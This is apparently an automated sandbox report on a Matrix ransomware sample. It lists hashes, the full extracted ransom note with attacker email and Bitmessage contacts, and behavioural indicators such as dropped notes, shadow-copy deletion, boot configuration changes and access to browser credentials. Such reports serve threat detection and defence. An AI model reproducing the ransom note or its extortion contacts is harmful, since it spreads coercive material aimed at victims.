matrix | 242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95

Analysis

max time kernel
143s
max time network
104s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
31/03/2025, 20:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MatrixRansomware.exe
Size

1.2MB
MD5

a93bd199d34d21cc9102600c6ce782cf
SHA1

31b50d84aa1af4f0e76a523382caba476f6e45dc
SHA256

242713ef2f372f0d39ca8f01bd09c9f99bcfe850e156621c023dd9e0bfb9bd95
SHA512

642e0cacf80a54ffa8f1bdeebb2a9b9449bb062bc331924ff8b6c93853ade68cdbd23928081d7c5da7bce944f5c553b0c4b05bd90fda525f017415bd891534c2
SSDEEP

24576:NykKxXJdZiDTrfJR5ez1888K0aNE1eXTBoAlK/u95ByxXEfui:N8bcLK+KzlK/udyh/i

Score

10^/10

matrix credential_access defense_evasion discovery evasion execution impact persistence ransomware spyware stealer upx

Malware Config

Extracted

Path

C:\Program Files (x86)\Google\GoogleUpdater\134.0.6985.0\Crashpad\#README_EMAN#.rtf

Ransom Note

{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 0BA48B037BBA3FBE\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 0BA48B037BBA3FBE\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 bvMaf0Uo\cf0\f1\fs32\lang1049\par \par }

Emails

[email protected]\par

[email protected]\cf1\fs24\par

URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	ioc	Process
File created	C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sq\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\SetupMetrics\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\s50w9h92.default-release\storage\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\edge_game_assist\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\include\win32\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Windows.CBSPreview_cw5n1h2txyewy\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\_locales\bg\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\LocalState\PinnedTiles\26310719480\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\kk\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\Trust Protection Lists\Sigma\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\ResiliencyLinks\edge_feedback\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\ProgramData\Package Cache\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}v64.8.8795\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2024.8.10.0\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adm\fr\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\BHO\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\ResiliencyLinks\VisualElements\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeUpdate_disable\1.3.195.43\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\include\win32\bridge\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-IN\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\s50w9h92.default-release\datareporting\glean\events\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnGraphiteCache\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\edge_feedback\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\_locales\en_GB\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\INetCache\NIML1QQ5\#README_EMAN#.rtf	MatrixRansomware.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-976934595-4290022905-4081117292-1000\Control Panel\Desktop\TileWallpaper = "0"	reg.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\af\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\be\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\ur\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.14\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Public\Pictures\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\VisualElements\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\management\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Protect\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Public\Documents\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_1\_locales\pt_BR\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{f7af1ddb-6edd-44dd-acf1-89e45653abcb}\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\Java\jdk-1.8\jre\lib\security\policy\limited\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\de\#README_EMAN#.rtf	MatrixRansomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir\#README_EMAN#.rtf	MatrixRansomware.exe

Matrix family
matrix
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
7864	bcdedit.exe
7796	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	WZX2Alx164.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS"	WZX2Alx164.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Executes dropped EXE 64 IoCs

pid	Process
3276	NWhc4uOm.exe
7352	WZX2Alx1.exe
7512	WZX2Alx164.exe
8068	WZX2Alx1.exe
3352	WZX2Alx1.exe
2284	WZX2Alx1.exe
8020	WZX2Alx1.exe
3440	WZX2Alx1.exe
3132	WZX2Alx1.exe
5088	WZX2Alx1.exe
8160	WZX2Alx1.exe
3736	WZX2Alx1.exe
9020	WZX2Alx1.exe
2440	WZX2Alx1.exe
5416	WZX2Alx1.exe
2316	WZX2Alx1.exe
2952	WZX2Alx1.exe
7044	WZX2Alx1.exe
2264	WZX2Alx1.exe
2652	WZX2Alx1.exe
6732	WZX2Alx1.exe
4896	WZX2Alx1.exe
6844	WZX2Alx1.exe
7428	WZX2Alx1.exe
6552	WZX2Alx1.exe
6800	WZX2Alx1.exe
6928	WZX2Alx1.exe
7080	WZX2Alx1.exe
8572	WZX2Alx1.exe
5576	WZX2Alx1.exe
892	WZX2Alx1.exe
5244	WZX2Alx1.exe
5680	WZX2Alx1.exe
7212	WZX2Alx1.exe
296	WZX2Alx1.exe
7704	WZX2Alx1.exe
4492	WZX2Alx1.exe
4548	WZX2Alx1.exe
5904	WZX2Alx1.exe
8176	WZX2Alx1.exe
3464	WZX2Alx1.exe
5228	WZX2Alx1.exe
5892	WZX2Alx1.exe
1380	WZX2Alx1.exe
8896	WZX2Alx1.exe
7924	WZX2Alx1.exe
864	WZX2Alx1.exe
5912	WZX2Alx1.exe
7292	WZX2Alx1.exe
7184	WZX2Alx1.exe
5928	WZX2Alx1.exe
8312	WZX2Alx1.exe
6424	WZX2Alx1.exe
6200	WZX2Alx1.exe
4780	WZX2Alx1.exe
9136	WZX2Alx1.exe
9064	WZX2Alx1.exe
8976	WZX2Alx1.exe
8864	WZX2Alx1.exe
8740	WZX2Alx1.exe
2332	WZX2Alx1.exe
6372	WZX2Alx1.exe
7516	WZX2Alx1.exe
8388	WZX2Alx1.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2432	Process not Found
6560	takeown.exe
4184	takeown.exe
7296	takeown.exe
9296	Process not Found
7028	Process not Found
6644	takeown.exe
2168	takeown.exe
4052	takeown.exe
6624	takeown.exe
10144	takeown.exe
7400	takeown.exe
8380	takeown.exe
9028	Process not Found
3892	takeown.exe
5712	takeown.exe
3416	takeown.exe
4700	takeown.exe
9772	takeown.exe
7952	Process not Found
5348	takeown.exe
5436	takeown.exe
4228	takeown.exe
4700	Process not Found
5004	takeown.exe
10016	takeown.exe
8476	takeown.exe
8128	takeown.exe
9720	takeown.exe
8316	takeown.exe
3920	takeown.exe
1388	takeown.exe
4684	takeown.exe
6220	takeown.exe
7560	takeown.exe
3700	takeown.exe
9132	takeown.exe
10168	Process not Found
9084	Process not Found
3460	takeown.exe
8324	takeown.exe
7988	takeown.exe
9056	takeown.exe
8032	takeown.exe
3124	Process not Found
7708	takeown.exe
8048	takeown.exe
7256	takeown.exe
5588	takeown.exe
9428	takeown.exe
8084	takeown.exe
9528	Process not Found
10056	Process not Found
6608	takeown.exe
3544	takeown.exe
3760	takeown.exe
5772	takeown.exe
3032	takeown.exe
2416	takeown.exe
5984	Process not Found
4052	takeown.exe
6704	takeown.exe
3968	takeown.exe
744	takeown.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 26 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Program Files\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	MatrixRansomware.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	MatrixRansomware.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	WZX2Alx164.exe
File opened (read-only)	\??\Z:	MatrixRansomware.exe
File opened (read-only)	\??\U:	MatrixRansomware.exe
File opened (read-only)	\??\A:	WZX2Alx164.exe
File opened (read-only)	\??\I:	WZX2Alx164.exe
File opened (read-only)	\??\M:	WZX2Alx164.exe
File opened (read-only)	\??\Q:	WZX2Alx164.exe
File opened (read-only)	\??\X:	MatrixRansomware.exe
File opened (read-only)	\??\G:	WZX2Alx164.exe
File opened (read-only)	\??\Z:	WZX2Alx164.exe
File opened (read-only)	\??\O:	MatrixRansomware.exe
File opened (read-only)	\??\N:	MatrixRansomware.exe
File opened (read-only)	\??\W:	MatrixRansomware.exe
File opened (read-only)	\??\L:	MatrixRansomware.exe
File opened (read-only)	\??\I:	MatrixRansomware.exe
File opened (read-only)	\??\N:	WZX2Alx164.exe
File opened (read-only)	\??\R:	WZX2Alx164.exe
File opened (read-only)	\??\L:	WZX2Alx164.exe
File opened (read-only)	\??\O:	WZX2Alx164.exe
File opened (read-only)	\??\Y:	MatrixRansomware.exe
File opened (read-only)	\??\V:	MatrixRansomware.exe
